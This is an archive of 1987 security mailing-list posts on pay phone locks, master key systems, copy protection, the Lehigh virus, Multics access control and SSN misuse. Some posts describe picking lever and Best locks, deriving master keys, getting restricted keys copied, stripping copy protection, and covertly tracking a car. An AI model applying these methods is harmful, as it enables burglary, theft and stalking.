experience with this? I'm also cc'ing this to telecom. -Mike From: fine@gondor.psu.edu (Steve Fine) 22-Nov-1987 19:44:30 To: security@RUTGERS.EDU Subj: [844] Re: Picking locks on pay phones Brock Meeks (brock@pnet01.cts.COM) asked if it was true that only one person in the U.S. can pick the lock on a pay phone. I think the uniqueness claim is exagerated. I read an article (possibly in the Toledo Blade) in the past few years about someone who had been picking locks on pay phones in Ohio. I don't remember the details but I think the person had made a special set of tools that allowed him to pick the lock. Even with the special tools, the phone company claimed that it would take about 20 minutes to open the lock. -- Steve Fine Internet: fine@gondor.psu.edu BITNET: fine@psuvaxg ARPANET: fine%psuvaxg.bitnet@wiscvm.arpa UUCP: {allegra|ihnp4|akgua}!psuvax1!gondor!fine From: gregm%csd4.milw.wisc.edu@csd1.milw.wisc.edu (Gregory Jerome Mumm) 17-Nov-1987 18:55:23 To: misc-security@uunet.uu.net Subj: [1085] Car alarms I am curious as to the operation of a normal auto alarm. I know that most of them use some sort of sensor ("black box") that I believe is installed between the battery and the rest of the car. My question: how does this "black box" work? When a door or trunk is opened is triggers this sensor and eventually causes the alarm to go off. I am thinking about building an alarm system when I get time and would appreciate any general advice and a possible circuit diagram of this misterious "block box". With current draining from the battery when a car is off (dashboard clocks, radio memory etc...) I don't see how a sensor could detect a change in this current. THANKS -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- ( From: gregm@csd4.milw.wisc.edu ) BITNET: gregm%csd4.milw.wisc.edu@wiscvm.bitnet {seismo|nike|ucbvax|harvard|rutgers!ihnp4}!uwvax!uwmcsd1!uwmcsd4!gregm From: judice%unxa.DEC@decwrl.dec.com (Louis J. Judice) 22-Nov-1987 16:46:38 To: security@RUTGERS.EDU Subj: [1527] Why secure systems? >The resources are no longer terribly scarce but the "oligarchy" continues >in their ways. For example, on our large IBM a student account is >assigned about 1MB of disk storage (max.) He can of course try to ask >for more but the bureaucracy can be very discouraging. I don't think this is characteristic of "central computing facilities", merely poorly managed or under funded ones. A key to to any customer oriented business is to meet customer needs. >I notice that many of them have a lot of trouble with the fact >that they cannot produce accounting charges for ethernets. So they >find other ways to bang people over the head with the cable >(restrictions in gateway software, per-port charges etc.) I doubt that your central computing service is trying to put "port charges", etc. in place simply to extend their monopolistic rule over facilities. Since they probably have this funny thing called a "budget" to work within, the accountants most likely have forced them to find ways to equitabily charge out resource usage. I suspect that YOUR department head would have trouble if the comp center came to him/her and said, "oh, we're going to charge your department $40,000 for network usage which we cannot account for..." I don't think the issue is security in central environments. It's just poorly managed central environments that don't serve user needs! Lou From: Larry Hunter 13-Nov-1987 16:47:20 To: sundc!netxcom!dgidez@seismo.css.gov (Daniel Gidez) Subj: [2072] Re: night scope I am once again asking about this stupid machine. Where can I buy either a used or surplus nightscope/ or if available and totally independent infrared sniperscope. I'm not sure what you mean, so I'll tell you about both light amplifiers and infrared devices. Amplifiers are nice in that they are passive (no one can find you by your light source) and can provide better images, but IR is much cheaper and pretty effective for most applications. They're not as expensive as you might think if you're smart about shopping around. First, if you're looking for second hand stuff, avoid first generation (multi-tube or multi-stage) light amplifiers -- they just don't work that well. Second, try electronics houses that don't specialize in surveillance or police stuff. Light amplifiers: SEC (Standard Equipment Company) / 9240 N. 107th St. PO Box 2360 / Milwaukee WI 53224 : NVS-80 75-1200mm monocular night scope (for mounting on a camera) $2795 [If by sniperscope you mean something intended for mounting on a gun (now why would anyone want that?) then try their NVS-520 for $4495] Edmund Scientific (Great source, low prices!) 101 E. Gloucester Pike Barrington NJ 08007: Night Vision System K31073 75mm including eyepiece $2495 InfraRed stuff: ETCO Electronics / North County shopping center/ Rt 9 north/ Plattsburgh, NY 12901 : Excellent infrared viewer and source powered by 4 D batteries. Light weight, possible to take excellent photos, field of view about 150 ft. Price is $279, + $10 for a battery pack and $15 for a 10X objective. There may be an even cheaper kit version available now. Great deal! Edmund also has a variety of IR sources, conversion lenses and viewers. You could add a high power IR source to the ETCO viewer and have a gadget that the "surveillance retailers" sell for $4000+ for less than $500. Happy viewing.... Larry From: ISA@ISEC-OA.ARPA 18-Nov-1987 23:33:25 To: SECURITY@RED.RUTGERS.EDU Subj: [509] AUDIT TRAIL SOFTWARE: HELP !!!!!!!! I'm looking for a piece of computer software which will allow me to capture all activity of a keyboard on a PC (MS/PC-DOS). It must be able to read the internal clock and create a file which can be hidden and date/time stamp the activity. Jim Vavrina Department of the Army Information Systems Software Center Security and Intell Division DDN:ISA@ISEC-OA.ARPA PHONE:703-664-3339 From: ejs%acorn@oak.lcs.mit.edu 23-Nov-1987 12:14:12 To: Bill Sommerfeld Subj: [807] [Re: Why secure systems? ] > [1] Multics AIM (the access isolation mechansim, a non-discretionary > access control system), is the only big wart -- it was designed to > prevent trojan horses from letting classified information escape, and > instead is probably a big waste of the users's time. It was also > kludged in after the original design. Although AIM was added to Multics after the initial design and implementation, it has undergone thorough penetration and functional testing by the DoD and is indeed in active use at at least one DoD installation. Multics has officially been certified at the "B2" level (which requires a mandatory access control (non-discretionary)). From: Bill Sommerfeld 23-Nov-1987 12:26:43 To: ejs%acorn@oak.lcs.mit.edu, security@red.rutgers.edu Subj: [548] Re: Why secure systems? I did mean to imply that AIM caused Multics to be insecure. I meant that AIM probably causes Multics to be _unusable_, at least by people trying to cooperate on a project, and that it is overkill for the problem it tries to solve. It _is_ used on MIT-MULTICS to a certain degree, to keep the backup system from trying to back up a few bad spots on the disks.. - Bill From: *Hobbit* 2-Dec-1987 10:20:40 To: security Subj: [2413] virus alert [This has been all over numerous other mailing lists; some of you may not have seen it yet. _H*] Virus Invades Lehigh University Last week, some of our student consultants discovered a virus program that's been spreading rapidly throughout Lehigh University. I thought I'd take a few minutes and warn as many of you as possible about this program since it has the chance of spreading much farther than just our University. We have no idea where the virus started, but some users have told me that other universities have recently had similar problems. The virus: the virus itself is contained in the stack space of COMMAND.COM. When a pc is booted from an infected disk, all a user need do to spread the virus is to access another disk via TYPE, COPY, DIR, etc. If the other disk contains COMMAND.COM, the virus code is copied to the other disk. Then, a counter is incremented on the parent. When this counter reaches a value of 4, any and every disk in the PC is erased thoroughly. The boot tracks are nulled, as are the FAT tables, etc. All Norton's horses couldn't put it back together again... :-) This affects both floppy and hard disks. Meanwhile, the four children that were created go on to tell four friends, and then they tell four friends, and so on, and so on. Detection: while this virus appears to be very well written, the author did leave behind a couple footprints. First, the write date of the command.com changes. Second, if there's a write protect tab on an uninfected disk, you will get a WRITE PROTECT ERROR... So, boot up from a suspected virus'd disk and access a write protected disk - if an error comes up, then you're sure. Note that the length of command.com does not get altered. I urge anyone who comes in contact with publicly accessible (sp?) disks to periodically check their own disks. Also, exercise safe computing - always wear a write protect tab. :-) This is not a joke. A large percentage of our public site disks has been gonged by this virus in the last couple days. Kenneth R. van Wyk, User Services Senior Consultant, Lehigh University Computing Center (215)-758-4988 From: bzs@bu-cs.bu.edu (Barry Shein) 19-Nov-1987 22:58:53 To: security@red.rutgers.edu Subj: [2273] Student Lab Security and Preventing Trojan Horses I wonder about all these precautions to stop students from copying software. I agree that some common practice has to be established like making sure students understand that copying can be construed as a crime, collecting and signing out software (protecting the physical disks and manuals is obviously desireable) and all that. I just wonder what motivates people to spend lord knows how many hours writing magic encrypting loaders and things like that. Did the manufacturers ask you to do this sort of thing? Did you feel that it was the only way to protect yourself from some possible litigation? Did you seek legal consul from the University before investing all that time and trouble (I assume at the University's expense)? I realize it may have been worthwhile (in your eyes) just to prevent trojan horses, so don't take me wrong, I'm honestly curious. I suppose the real problem with these systems is that they don't have any rational file protection schemes, I've certainly never been tempted to go to such lengths on systems which did. I also wonder how much one can just say "hey, if the manufacturers cared about such things they'd do something about it, they can't ask me to subsidize their needs." Copy-protection is not an acceptable "something". For example, I was at a University level meeting with our Macintosh rep and this very subject came up. Someone in the room started going on and on about schemes to prevent copying. I interrupted and said (in a semi-official tone of voice) the University was more than willing to follow whatever guidelines Apple and/or the software vendors recommend to prevent such potential problems and manage these measures responsibly. But we refuse to show any *more* interest in the problem than the vendors do. If you can supply me with anything written discussing their position on such things I would be more than happy to study it. The apple rep basically nodded his head, I'm not sure because he agreed or just agreed that there was nothing more that could really be said (probably the latter), but it ended there. -Barry Shein, Boston University From: oster@dewey.soe.berkeley.edu (David Phillip Oster) 22-Nov-1987 18:11:24 To: misc-security@ucbvax.berkeley.edu Subj: [1880] Re: Student Lab Security and Preventing Trojan Horses Derek Andrew, U of Saskatchewan, described a scheme for protecting microcomputer software that uses a separate loader program, so the only image on disk is encrypted. Some commercially released Macintosh music programs were protected using this scheme. I recently recieved the source code for a desk accessory called FixJT (Fix Jump Table) that removes the copy protection from such programs. Here is how it works: Since the program must reside in memory in an unprotected form in order to run, and since desk accessories run in parallel, in the same memory space as applications, FixJt just writes out the in-memory image to disk in a form that the operating system can run directly. (It cycles through the Mac's table of executable segments, marking each one as writable, and writing it to disk. It also turns off the handling of clock interrupt tasks, so if the program set a watchdog to try to defeat FixJT, that watchdog won't get triggered.) Any application program that allows the running of desk accessories and is protected via an external encryption utility can be deprotected by such a scheme. The application must have direct copy protection code built-in, to discover the presence of some non-copiable resource frequently, and continually decrypt one portion of itself to use, and re-encrypt other portions of itself to hide them, so that at no time does a complete, decrypted copy of itself exist in memory, that a watcher desk accessory could just write out. --- David Phillip Oster --A Sun 3/50 makes a poor Macintosh II. Arpa: oster@dewey.soe.berkeley.edu --A Macintosh II makes a poor Sun 3/60. Uucp: {uwvax,decvax,ihnp4}!ucbvax!oster%dewey.soe.berkeley.edu From: mdf@gpu.utcs.toronto.edu (Matthew Francey) 22-Nov-1987 22:17:55 To: Subj: [485] Re: Student Lab Security and Preventing Trojan Horses > The loader must provide its own security by +++++++++++++ What prevents the student from copying the loader? What prevents the student from disassembling the loader to ascertain the encryption method (um... what method do you use? or is this newsgroup run on a Need To Know basis? :-) ) and/or keys? -- mdf From: moss!ihlpf!bird@RUTGERS.EDU (Walters) 23-Nov-1987 13:42:55 To: security Subj: [943] Driveway Metel Detector I am very interested in obtaining the schematics for the circuitry that electronically detects cars at left turn lanes, etc. In addition, any building and/or installation tips would be much appreciated. I intend to use the circuit to detect cars pulling into my driveway. During the day it will sound an alarm so my wife will know someone is there. After dark it would also light a yard light for some period of time so as to provide visitors lighted access to the house. I am not interested in where I can buy commercial circuits unless they are implemented by burying wire in the street i.e. Brookstone sells a "tube" one buries in the driveway. The problem here is that the tube is not long enough to assure a car entering my wide driveway would pass over it. Joe Walters ihnp4!ihlpf!bird (312) 979-3091 From: puff!kailhofe@RUTGERS.EDU (Andrew D. Kailhofer) 23-Nov-1987 22:54:00 To: misc-security@RUTGERS.EDU Subj: [1957] Re: master key security >What will the administration do if they find such a lock has >been removed by brute force (ie. saber sawing it out of the door)? >Surely this implies that the whole master keying system is >compromised. Ideally, they would rekey all the locks. Oh, how I know this problem. Within the last few weeks we've had three locks stolen from doors in our building, one with computers all over the place. A building that is also on a campus that has a pretty smart gang of computer theives on it. The locks were simply torn out (Sargeant locks). I spent days hiding equipment while we wait for a locksmith to install a few new (good) locks in a few rooms. If they don't get it done by the upcomming holiday, we're doomed. We know they are after a master, the locksmiths know they are after a master, and it makes me soooo mad! The security of my building is compromised, and my babies stand the risk of being gutted, from model A PC's right on up to a 3B15. I just hope that they leave the lock-down cables that will be chopped where they chop them so that we are only stuck with a $250 deductible forced entry replacement instead of a $1K deductable for non-forced entry theft (per item). Has anyone else out there had this problem? Can anyone else offer any suggestions? We already re-keyed once this decade, so the UW administration isn't likely to consider that as a viable option. Please, Boys! Help me save my wee bairns. Andrew D. Kailhofer |507 VanVleck Hall | This third left Systems Consultant |Madison, WI 53706 | blank for reasons UW-Madison Math Department |(608) 263-4189 | of national kailhofe@weaver.math.wisc.edu |I wrote it, it's _mine_!| security (spooks and ...!uwvax!vanvleck!kailhofe |Bansplaft! | all that stuff). From: ssr@tumtum.cs.umd.edu (Dave Kucharczyk) 24-Nov-1987 01:25:59 To: security@red.rutgers.edu Subj: [1270] Payphone locks Regarding picking a payphone lock it is possible that this person has made a very special tool that would make it much more likely that one could pick a payphone lock. Payphone locks use a 9 or ten lever, lever lock. The levers are very thin and close together to make picking difficult and also have a ratchet that catches the lever if it is raised too high during picking. One could make a tension wrench that also allows the resetting of the ratchet, like when a key is inserted but you would have to have a lock from a payphone in the first place. Then one would need a special tool to throw the bolt on the coin box cover, but that is a relatively simple item compared to the tension wrench for the lock. By the way the coin box is a removable sealed box that has a special seal on it. When the coin collector comes around he pulls the full box out which closes itself as it is extracted from the actual payphone housing. He then inserts a empty and open box back into the housing which then primes it so that upon removal it seals itself untill it is reset, which can only be done by breaking the seal on the box. ssr From: murray@andromeda.rutgers.edu (Murray Karstadt) 23-Nov-1987 16:59:33 To: security@red.rutgers.edu Subj: [277] A little while ago someone mentioned Check-Point Security Systems ( to prevent the rip off of software) does anyone know where I get find these people murray From: len@csd4.milw.wisc.edu (Leonard P Levine) 24-Nov-1987 18:25:17 To: misc-security@uunet.uu.net Subj: [1182] Re: master key security >It must be very expensive to rekey all the locks on a campus. It is. Here at UWM when the college rekeyed one building with 80 faculty offices and some 40 labs, the cost was of the order of $25,000. The problem with master keys being lower than the sub masters deals with the way the keys are installed by the locksmith. S/he "builds" the keyset by inserting a master key in the lock cylinder and adding slugs for the local and submaster set, finally adding the slugs needed to make the master. The cylinder then is flat across the top and may be inserted into the stationary door part. If the master was higher than the submaster, the locksmith would have to make several keys for the building of the cylinders. Lethargy rules, the master is low and easy to make from any submaster. An even easier way to bust the system is to take the keys, usually marked "do not duplicate" to a shop for duplication, after taping over the above marks with a legend such as "elevator" or "garage". Most shops will gladly duplicate such a key. From: jslove%starch.DEC@decwrl.dec.com (J. Spencer Love) 25-Nov-1987 02:29:42 To: security@Red.Rutgers.Edu, JSLOVE@decwrl.dec.com Subj: [3417] Re: Internal setscrews The "from the inside" setscrews don't protect padlocks, which are by far the most vulnerable locks in most Best and Falcon systems. As many bicycle owners know, cutters which can remove a padlock from a hasp are too easy to come by, and the words "hardened steel" are essentially irrelevant. One way to deal with this problem is to use a separate control key and mastering system for padlocks and other unsupervised areas. The control key is implemented as a sleeve around the plug, where the plug is the part of the lock which rotates when the lock is normally operated. This sleeve is about 1/8" thick for the part which faces opposing circle of the figure 8 profile of a Best lock, and includes the tooth which holds the core into the lock. This describes a bit more than 60 degrees of the sleeve, the other 300 degrees are also present, but the metal is much thinner, and thus less noticeable. The sleeve along the bottom of the keyway typically has five or six small holes (one under each pin), which may be intended for use by the locksmith when assembling or rekeying a core. These small holes permit making a specialized wrench to apply torque to the sleeve without applying torque to the plug. Such a tool makes it relatively easy to pick the sleeve, thus removing the core. The core operates in only one direction, turning about 20 degrees, since the tooth must withdraw into empty space within the core. The Best locks are well made, so it is easy to disassemble and reassemble them. Penetrating such a system can be done without property damage. If the system stamps a code on each lock and key, it is often possible to derive the whole system by examining two or three keys and a single lock. This could be made more difficult by assigning the codes non-sequentially, but the systems which I have seen didn't do this. The Best locks that I have seen have 5, 6 or 7 pins, each of which has 10 possible stopping points 1/80" apart. Because the thinnest master pin is 1/40" thick (to keep from turning sideways), only the even or odd numbered stops are used by any given pin (but the control key can violate this). With one stop reserved for the grand master, 4 stops per pin are available for pass keys. The master key has at least one cut which has more metal than any pass key, so that griding the keys down never can produce a master key. When submasters are provided, the grand master can't be made from any submaster, and so on. However, metal can be added to a key using silver solder, which can easily be filed down and has a reasonable lifetime (regular solder is too soft, so the lifetime would be only a few uses). The solder makes the key rather conspicuous when the campus cop asks to see your key ring, though. I think you would need acid-core solder; it's been a while. The usual disclaimer applies: don't try this at home, it's illegal. Knowing how to pick locks is only illegal if you exercise the skill on someone else's lock, but there are places were possession of the tools without a license (a locksmith's bond, or some such) is a felony. It can be a very useful skill in emergencies where forgiveness is easier to obtain than permission; every boy scout should have a locksmithing merit badge. From: Larry Hunter 25-Nov-1987 14:42:03 To: MCGUIRE%GRIN2.BITNET@YALE.ARPA Subj: [3484] RE: Bumper Beepers. And by the way, US Citizens have no reasonable expectation of privacy regarding movements tracked in public, said the Supreme Court in 1983: US v. Knotts, 103 S. Ct. 1081 (1983). However, I imagine that installing a beeper on someone else's car without their knowledge or permission is trespassing at the very least. That's an interesting question! US v. Knotts was a case in which the police attached a bumper beeper to a car and followed it. It was held that there was no violation of the 4th amendment because there is no reasonable expectation of privacy of movements in public. There was a case decided shortly thereafter where a beeper was placed inside a package (containing drugs, I believe) and the police followed the package and then traced its location inside the suspect's home. That search was overturned because the suspect did have a reasonable expectation of privacy inside his home: US v. Karo 104 S. Ct. 3296 (1984) "Montoring of a beeper to trail a container into a house and... keep[ing] in touch with it inside the house... did violate the 4th amendment." Now as to leaving a bumper beeper on someone else's car: There are things that the police can do that others can't, but I don't think trailing cars with gadgets is one of them. I'd guess that it is legal for anyone to use a bumper beeper for trailing a car in public. It's hard to imagine a criminal charge coming out of trailing a car. Trespass isn't appropriate since there is no entering the car, and assuming the beeper was placed when the car was parked on a city street and not in the guy's garage, there's no real property trespass either. If someone gets mud on your bumper he hasn't trespassed -- likewise if he puts a gadget there. You're not monitoring communication, so none of the wiretapping laws would help. Since there is no reasonable expectation of privacy as to movements, you're not violating the target's civil rights, either. There might be a shot at a vandalism charge, but he'd have to show that the beeper damaged the car in some way. Damages might arise from the result of being trailed and maybe the beeper could be worked into a civil suit -- juries probably wouldn't like the idea of following someone by bumper beeper too much and might think the follower was a bad guy, but then again it might not be treated as relevant evidence; it probably depends on the skill of the lawyers involved. I'm not a lawyer, so I wouldn't take this as the last word, but I am pretty familiar with the laws about privacy in the US and it seems to me that putting a bumper beeper on and following someone's car is completely legal. I think this is wrong, but that doesn't make it illegal. It is probably not the case that you could put a similar device on the person or some other possession of his, because if you "keep in touch with" it (what ever that means) while he is inside his house, you have violated his civil rights. Your car is not a domain where you have much in the way of privacy rights. Note: It is probably the case that you are abandoning the beeper when you put it on the car, so if the target finds the beeper it's his to do with as he pleases (I'd put it on a truck heading someplace remote and see who follows...) Larry From: Fred Blonder 25-Nov-1987 11:38:58 To: dnichols%ti-csl%csnet-relay.CSNET@RELAY.CS.NET Subj: [520] Re: Home security ... I have two young children and a cat and small dog which make a motion detector pretty unusable. Not necessarily true. The infra-red motion detectors can be adjusted to ignore reasonably small house pets. As for the kids: just use the system when there're no humans home. ---- Fred Blonder (301) 454-7690 seismo!mimsy!fred Fred@Mimsy.umd.edu From: ejs%acorn@oak.lcs.mit.edu 27-Nov-1987 15:37:28 To: Bill Sommerfeld Subj: [2454] [Re: [Re: Why secure systems? ]] > I did mean to imply that AIM caused Multics to be insecure. I assume you mean "didn't" above, right? > I meant that AIM probably causes Multics to be _unusable_, at least by > people trying to cooperate on a project, and that it is overkill for > the problem it tries to solve. I used AIM at the Pentagon for 4 years. Indeed in some circumstances it was cumbersome, but effective. Typically, a project is associated with one security classification, and one can "log in" at one level to work on it. The real problems come when one is logged in, say, at the Top Secret level, and wants to modify a file at the Secret level. If he copies the file from the Secret (directory) hierarchy to the Top Secret hierarchy, the system treats the data as Top Secret and a security officer must intervene to downgrade it at a later time. His only real alternative is to create a new process at the lower authorization. Yes, this is a pain, but I don't see many other alternatives. But I don't agree that AIM renders the system unsuable -- at least not in an environment where mandarory access control levels (like the military or government) are in place. In private industry, perhaps, AIM is overkill. AIM is also a real pain when such per-use databases such as profiles, init files, and mailboxes are concerned. The former two must be maintained at the lower classification/authorization level and modified only at the level -- a burden for most. Mailboxes on Multics, being multi-level, force the user to log in at the highest authorization to read all the messages, but prevent him from deleting old messages at any level but the level at which the message was sent (or destined). This is also an inconvenience. > It _is_ used on MIT-MULTICS to a certain degree, to keep the backup > system from trying to back up a few bad spots on the disks.. That is certainly a bizarre use of AIM and one which makes my stomach turn (having worked on the Multics security effort at Honeywell for some time). There are, however, other Multics sites using AIM, including some in the university environment, where grade protection was considered a suitable need for AIM. Take care. -- Eric PS: I no longer subscribe to the security mailing list, so any reply mail should be cc'ed to me, directly. From: judice%unxa.DEC@decwrl.dec.com (Louis J. Judice) 28-Nov-1987 10:02:27 To: security@RUTGERS.EDU Subj: [1407] re: why secure systems? >The resources are no longer terribly scarce but the >"oligarchy" continues in their ways. For example, on our large IBM a >student account is assigned about 1MB of disk storage (max.) He can >of course try to ask for more but the bureaucracy can be very discouraging. I don't think this is characteristic of "central computing facilities", merely poorly managed or under funded ones. A key to to any customer oriented business is to meet customer needs. >So they find other ways to bang people over the head with the cable >(restrictions in gateway software, per-port charges etc.) I doubt that your central computing service is trying to put "port charges", etc. in place simply to extend their monopolistic rule over facilities. Since they probably have this funny thing called a "budget" to work within, the accountants most likely have forced them to find ways to equitabily charge out resource usage. I suspect that YOUR department head would have trouble if the comp center came to him/her and said, "oh, we're going to charge your department $40,000 for network usage which we cannot account for..." I don't think the issue is security in central environments. It's just poorly managed central environments that don't serve user needs! Lou From: Larry Hunter 30-Nov-1987 12:58:20 To: Jonathan Harris Subj: [6042] Re: SSN In reply to the few examples people brought up of how someone can destroy you with a knowledge of your SSN: (1) The activities--getting the false drivers license, using it to obtain information about you, etc... are all serious criminal offenses. The abuser would cause you some hassles, which you would eventually clear up, and eventually find himself in jail with felonies on his record, drunk driving, etc.... This is a bit naive. First, although using false identification is a crime, it is not a serious one in most states. Using false information to obtain a credit card is also a crime, although again, credit card fraud is not a high priority for most police departments. Winning a civil suit is always possible in the case of fraud, but it would be difficult and expensive for a victim to track down and prosecute the perpetrator. Second, the idea that all this might cause the victim "some hassles, which you would eventually clear up" is simply wrong. People can get badly hurt by this stuff. Here's a recent court case that should frighten you: A Federal Judge in Los Angeles has confirmed a Michigan man's account of his three year nightmare of police arrests based on an error in the FBI's computer. The judge has ordered the police department that originated the error to pay the man damages. The nightmare of Terry Rogan of Saginaw begin in 1981, when an escapee from an Alabama prison received a copy of Rogan's birth certificate from a mutual acquaintance. The escapee assumed Rogan's identity and obtained a California driver's license in Rogan's name. The man was eventually arrested in LA on suspicion of murder. The suspect was released, but LA police later issued a murder arrest warrant in the name of Terry Rogan. Omitted from the warrant, however, were the suspects known physical characteristics, including a tattoo. If Terry Rogan, back home in Michigan, were the sort of fellow who never has a confrontation with the police, the erroneous warrant probably would have done him no harm. But Terry Rogan is black. Black males in urban areas have a probability of being arrested far greater than that of any other segment of the population. In 1982, Rogan was accused of trespassing by police in Saginaw county. He was then arrested on charges of resisting arrest. In accord with ususal policy, police queried the FBI's National Crime Information Center under Rogan's name. They got back a "hit," the California warrant in Rogan's name. The NCIC entry had no other identifying information even though, according to the court, the system permits up to 121 characters to be entered for this purpose. After comparing fingerprints and discovering from LA that the wanted man had a tattoo and that Rogan did not, police released him -- four days later. But within a few weeks, LA police reentered the Rogan name into NCIC. Within six months Rogan was stopped near his home for failing to use a turn signal. Officers ran a computer check on him, and again the murder warrant showed up. Rogan was searched, handcuffed at gunpoint and then arrested. Rogain was arrested again, this time for a traffic offense, and was again detained until the LA arrest warrant was explained. Rogan then asked an FBI agent in Saginaw to correct the entry; he was told to go to Los Angeles to do it himself. He was also told to write his Congressman. In July 1983 Rogan travelled to Texas to find work; there he was stopped for speeding. Again, because of the NCIC "hit," he was handcuffed at gunpoint and taken to jail. At about this time, LA police again reentered the warrant into NCIC. Not surprisingly, in January 1984, Rogan was again apprehended at gunpoint, this time for driving without his headlights on, back home in Saginaw. By then local police officers knew all about the unfortunate Terry Rogan. He was promptly released. But no one would make the effort to correct the FBI entry. It took a reporter from the "Saginaw News" to initiate the erasure process. The NCIC record was deleted, and the felon in Alabama was eventually convicted of the LA homicide. The LA police department gave officers operating their end of the NCIC system no training in how to delete or amend data once they had entered it into the system, according to US District Judge Robert J. Kelleher. Neither of the two officers involved thought about amending the NCIC record after they were notified of Rogan's mistaken identity.. One officer's policy in these situations, the court said, "was to give the innocent person a computer printout of the warrant and his business card as evidence of the person's innocence ONLY IF the person came to Los Angeles and picked up the items personally." ... The court found the City of Los Angeles liable for damages to Rogan, calling its conduct "both grossly negligent and systemic in nature" in depriving Rogan of his constitutional right to be free of faulty warrants. Rogan v. Los Angeles 85-0989 (CD Cal, 20 July 1987) [The preceding is quoted, with permission, from the Privacy Journal, an excellent publication available for $98/year from Box 15300 Washington DC 20003.] Notice that all that trouble arose merely over use of the name. With a social security number, it is possible that credit records could also become involved. Victims of this kind of activity are badly hurt -- no doubt about it. If instead of a police mistake, it had been the actions of an private individual that had caused the trouble, the chances of compensation would be remote. Compared to having a car vandalized, being repeatedly arrested at gunpoint, spending days in jail (very unpleasant!), loss of credit rating, etc. seem much more serious. Never underestimate the power of those 9 digits. Larry From: Jonathan Harris 30-Nov-1987 15:18:59 To: hunter-larry@YALE.ARPA Subj: [2648] Re: SSN Larry, "A bit naive" may be accurate if you want to spend your life worrying about getting hit by meteors and all sorts of other remote problems. Although not as serious as murder, credit card fraud and obtaining a false id will cause the perpetrator various serious trouble. I am pretty sure in the example listed, the crimes are felonies, although not extremely serious ones. Once convicted the guilty party will have a very difficult time obtaining any job where any degree of trust is involved, especially with the increase in the usage of background checks, etc. Of course there are people so messed up that they don't care about this kind of thing, as in the case you mentioned where the original perpetrator was a prison escapee. Injustice has happened before there were computers and widespread usage of SSN's. I am sure that we will still have to continuing fighting these cases as long as there is civilization. However the possibility of the kind of hassle mentioned in the article to which I replied is probably less than that of being hit by a car, robbed at gunpoint, or harrassed in a more "traditional" manner. It is rather pointless to end up with high blood pressure, heart disease, depression, and lost productivity because you spend half of your life fighting the phone companies or someone elses usage of your SSN or any other number. In response to your closing statement about having your credit rating trashed is worse than having your car vandalized. That is true if you have your car vandalized only once and collect the insurance. There are plenty of cases of peoples lives being made miserable by repeated harassment, firebombings, beatings, etc... Frankly I would much rather be suing TRW to get my credit rating restored than visiting a close family member in the hospital or worse the morgue. I know of people who have been forced out of their homes and killed or wounded as a result of "non-computer" harassment. --Jonathan --------------------------------------------------------------------- Jonathan G. Harris Bitnet addresses: jghha8r@uchimvs1 The James Franck Institute harris%go-han@uchicago The University of Chicago arpanet: harris@go-han.uchicago.edu 5640 S. Ellis Avenue alternate: harris@oddjob.uchicago.edu Chicago, Illinois 60637 ...!oddjob!go-han!harris (312)702-7234 numerical harris@128.135.4.20 From: brad@sun.com (Brad Taylor) 30-Nov-1987 19:51:37 To: misc-security@uunet.uu.net Subj: [1285] Re: something of some interest, subject: breaking DES Just a correction, in case people get the wrong idea: > the reason i mentioned it to van was that sun has now done two talks > at meetings about their security on the network that is based on > des using the diffie hellman key exchange in exactly the field > that we broke. both times the talk was given by the programmer > who is implementing it not the mathematician who decided what to > be implemented. i pointed them again to the papers on it; hope > a number theorist there actually reads them. The system Sun is using is NOT, I repeat IS NOT, the same one that Evi broke. The system evi broke is based upon the field GF(2^127). However, our system is based instead on the integers mod M, where M is a 128 bit prime number. In fact, in her paper, Evi even admits that logarithms in the field of integers mod M is intractible. I have given evi a challenge, and so far I have heard nothing. Here is the challenge for anyone else who cares to give it a whirl: P = (2^S) % M P = 962493b2991f6639a5f249aec8fc64e3 M = b520985fb31fcaf75036701e37d8b857 (hex) Find S. -brad From: Fred Blonder 26-Nov-1987 01:14:36 To: awalker@red.rutgers.edu Subj: [1484] Re: mister pay phone From: *Hobbit* Pay phones generally use lever locks. These were invented ages ago, before the pin-tumbler . . . How many ages ago? The pin tumbler lock was invented by (surprise) the ancient Egyptians. True, their keys were a bit large by modern standards (they were hung from the owner's belt.) but the principle was exactly the same. ---- Fred Blonder (301) 454-7690 seismo!mimsy!fred Fred@Mimsy.umd.edu [I stand somewhat corrected. However, the principle wasn't *exactly* the same -- the pins in the lock were only the top halves, and the pegs on the wooden key formed the lower halves when the key was pushed up into the slot. The security was based mostly on the *positioning* of the holes. Related to this, Larry then asks:] From: Larry Hunter Subject: Re: mister pay phone A properly constructed [lever lock] is extremely difficult to defeat... That's interesting! How come I use a pin-tumlber on my door at home? If these things are so good, how come they are not in wider use? Larry [HellifIknow. Perhaps they don't wear as well due to stronger springs, or get jammed more easily if left outside. This *is* an interesting question. I have no theories offhand -- anyone else? _H*] From: marauder@tc.fluke.com (Bill Landsborough) 1-Dec-1987 13:14:45 To: uw-beaver!misc-security@beaver.cs.washington.edu Subj: [1279] Re: Picking locks on pay phones When I was a pay phone coin collector in the early-sixtys in Bakersfield CA there was a man/woman team that was hitting the Kern Co. area pretty hard and they made my work pretty hectic. The way they would do it was they would both go into the phone booth and the woman would hold a newspaper up like they were calling want ads. The man would pick the lock with very sophisoticated tools and then "scrape" the bolt down to open the lock. Pacific Telephone invented a new C version lock that was "unpickable" but this guy was successful in picking at least one C version that I remember. I came into a bar one morning only to have missed him by less than 10 minutes. When I opened up the door for the coin box there was no coin box and there was no money laying in the bottom of the phone housing. I asked the bartender who was the last person to use the phone and he described the couple to me. Sometimes he got ~$120....sometimes $.30. We never caught him while I was there to 1964. Bill Landsborough -- "Answer a fool according to his folly, or he will be wise in his own eyes." Proverbs 26:4 From: mimsy!cvl!decuac!uccba!ncoast!smith@RUTGERS.EDU (Phil Smith) 2-Dec-1987 06:41:14 To: moss!cbosgd!misc-security@rutgers.EDU Subj: [634] Re: mister pay phone > It would seem more likely that this guy knocked > over a coin collector and stole his key ring. It would not do him a great deal of good to have stolen keys from a coin collector. The coin box locks are all keyed differently. True you will eventually find duplicates I would think, but not enough for the amount of phones he has supposedly hit. -- decvax!mandrill!ncoast!smith ncoast!smith@cwru.csnet (ncoast!smith%cwru.csnet@csnet-relay.ARPA) From: *Hobbit* 4-Dec-1987 05:35:47 To: security@RED.RUTGERS.EDU Subj: [742] Best control wrench Note that since the control shell is only .0125 inch thick at the bottom of the keyway where the holes are, and the proposed tool must exert *no* tension between the plug and the control shell, you have a difficult machining problem here. Do such tools actually exist, and do they work at all well given the relatively tight tolerances involved [which can 